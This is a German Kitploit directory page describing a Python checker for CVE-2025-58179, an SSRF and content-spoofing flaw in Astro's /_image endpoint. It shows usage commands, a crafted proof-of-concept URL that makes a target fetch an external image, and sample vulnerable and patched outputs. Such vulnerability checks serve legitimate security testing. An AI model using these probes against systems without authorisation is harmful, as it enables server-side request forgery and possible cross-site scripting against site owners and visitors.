Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58179-Check | Kitploit
Tools/GitHubGitHub/shitodcy/cve-2025-58179-check
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58179-Check

CVE-2025-58179-Check ist ein einfaches Python-Skript zur Überprüfung der SSRF (Server-Side Request Forgery) / Content-Spoofing-Schwachstelle am Endpoint /_image im Astro-Framework.

Diese Schwachstelle wird als GHSA-qpr4-c339-7vq8 und CVE-2025-58179 geführt.

Hintergrund der Schwachstelle

Diese Schwachstelle betrifft Astro-Websites, die den Adapter @astrojs/cloudflare mit der Konfiguration output: 'server' verwenden. Der Endpoint /_image, der eigentlich Bilder optimieren soll, validiert den Parameter href nicht korrekt.

Dadurch kann ein Angreifer den Server veranlassen, Inhalte von einer beliebigen unautorisierten externen Domain abzurufen und auszuliefern. Die Auswirkung kann SSRF sein; wenn es sich bei den externen Inhalten um eine schädliche Datei handelt (z. B. ein SVG mit eingebettetem Skript), kann dies zu Cross-Site Scripting (XSS) führen.

Dieses Skript automatisiert den Testprozess, um festzustellen, ob eine Website für dieses Problem anfällig ist.

Funktionen

  • Erstellt automatisch eine PoC-URL (Proof of Concept) im korrekten Format.
  • Führt eine optionale HTTP-Überprüfung durch, um die Serverantwort zu prüfen.
  • Färbt die Ausgabe zur einfacheren Analyse ein (Statuscode, Ergebnis).
  • Erkennt verwundbare Antworten (z. B. Status 200 mit Content-Type: image/*).

Voraussetzungen

  • Python 3
  • Die Bibliothek requests (nur wenn die Verifizierungsfunktion verwendet wird)

Sie können requests mit pip installieren:

root@kitploit:~
pip install requests

Verwendung

  1. Klonen Sie dieses Repository oder kopieren Sie das Skript CVE-2025-58179-Check.py.
  2. Stellen Sie sicher, dass das Skript ausführbar ist (falls erforderlich): chmod +x CVE-2025-58179-Check.py

1. Nur URL erstellen (ohne Verifizierung)

Diese Option gibt lediglich die bereits encodierte PoC-URL aus. Nützlich, wenn Sie manuell im Browser oder mit anderen Tools testen möchten.

Befehl:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>

Beispiel:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)

Ausgabe:

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

2. URL erstellen und HTTP-Verifizierung durchführen

Diese Option erstellt die URL und sendet sofort eine HTTP-GET-Anfrage, um die Serverantwort zu verifizieren.

Befehl:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r

Beispiel:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request

Beispiel für Verifizierungsausgabe

Beispielergebnis: Verwundbar (Vulnerable)

Wenn der Server den Statuscode 200 zurückgibt und der Inhaltstyp ein Bild ist, deutet dies darauf hin, dass der Server externe Inhalte abgerufen und ausgeliefert hat.

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!

Beispielergebnis: Nicht verwundbar (bereits gepatcht)

Ein bereits gepatchter oder korrekt konfigurierter Server lehnt Anfragen an unautorisierte externe Domains ab, in der Regel mit einem 4xx-Status.

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible

[!WARNING] WARNUNG

  • Dieses Skript wurde zu Bildungszwecken und für legitime Sicherheitstests erstellt.
  • Die Benutzer sind für ihre Handlungen vollständig verantwortlich. Verwenden Sie dieses Skript nicht auf Systemen, für die Sie keine Berechtigung haben.
Tool herunterladen